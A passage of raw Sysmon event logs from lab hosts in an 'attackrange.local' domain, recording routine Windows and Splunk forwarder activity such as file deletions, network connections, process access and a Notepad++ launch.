Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6F1EAC8DA998F39D14D6CA8FB24D5D,SHA256=51E7DEDBA027FF6D3CB460173F32831CF9B8077E8FB2C6BC30773F0549F4FDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:05.751{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D80AFA9BA41DC8FB5293D36000379618,SHA256=A19A72B22AC6AFBDFB21E67EDAF2D9EA6DE19231937D3A69E25E3F35314E5A4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:05.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED9EEB5EA99F0F0253011651D9FAA42,SHA256=2A37F9C1FB0401BD6ACCE0B88B89043061F1F2860621FC11000EBA0DB1981C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:05.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAB12540C99F51C025E0BA0A5C826BAF,SHA256=C3E1F2C12A9ED8C3A442E4ACB127BE6CFA8062624953E75E20F5C3630A81DE3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:04.031{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-16976-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:05.641{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFA3C63AD9E4A43BC20694984E82B81,SHA256=5940B6AB059ED1DD41C803BBD68DF778C8376130B1134732C290D9C1EA32D20A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:56.786{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50979-false10.0.1.12-8000- 23542300x80000000000000001047691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1035CB32845CB25A58036E9AD73E3CD,SHA256=3B556D1AA0F769F53B9D2EC2FE9DC9D6C3D645653EC3EB25C837B10FB1845D34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:04.899{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57223-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:06.657{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D245B885A5E41C406E5CF409CD54D8F2,SHA256=CD2808DD72CCB2D3DADCEFFF11B6452D574D35307E956BF198C84A3DFB31FA3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.199{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.152{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001047688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:06.152{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001047687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:49:06.152{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1212.197617904C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001047686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:49:06.152{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1212.197617904C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:07.657{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF044E3E24E3C61D37B511F3315D554F,SHA256=5DEA6BAD96980A291FAADE81CC85463E4638F2CDA68356EEC2D438CB336D56E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:07.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311DBBB2682952A0318FC90F69342B5B,SHA256=CD8DA57B16C224D4FD5FEF06B9F682952E516B0CBF6D5E29DE33BCD2055336E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:58.297{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57223-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001047708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241010D53FF084E5DBB267C6F23ABA86,SHA256=D2E4329606EEECC766C5D4B4B7F098EE7B207E3CA35FD5A81B96267D15CC6A57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:08.704{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD815E83FEB8B8AAFAE3F087C3F1F4C1,SHA256=56C482DD3D16BC74B4B06EAA9C0B2C15914D6C6A05B191EAD16274BB314CF8F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.283{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.283{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.283{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F3F4-60EB-147D-00000000CF01}7844C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F3F4-60EB-147D-00000000CF01}7844C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001047694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.186{466BC892-F3F4-60EB-147D-00000000CF01}7844C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x8000000000000000806971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:08.336{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57224-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:09.704{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7746F768D5F9891D7F231617EFBD47A8,SHA256=4D662790A6AC6952D89A69C48970F31D2AB423DE3DF6C8ECF084434967770F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:09.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502643C7B01D039CD81DB2F1A6513A92,SHA256=3D5F381B06D695553E946A9A2237B597218285E45296A09612FCC3D7E5AC5D26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:09.184{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59046AA571F1CE41D74E57AB215C47FE,SHA256=8022473F02AF290F8151D95496A41861520358FDDECB6374A5DB7F6EA888AA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:09.184{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80302A7F111A85C01213FD83AC6E8F18,SHA256=2C5F67C874E4C95E02FB5721F6F45831EFB541B33A8C2CA9C34AAA41C907DF13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:10.719{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA85AC53674FF5DC3D2019D66DB9B637,SHA256=082897EE3C9884762FCC4A19DF866312AA7D2A42DA7D0ACEC796BB229935584F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 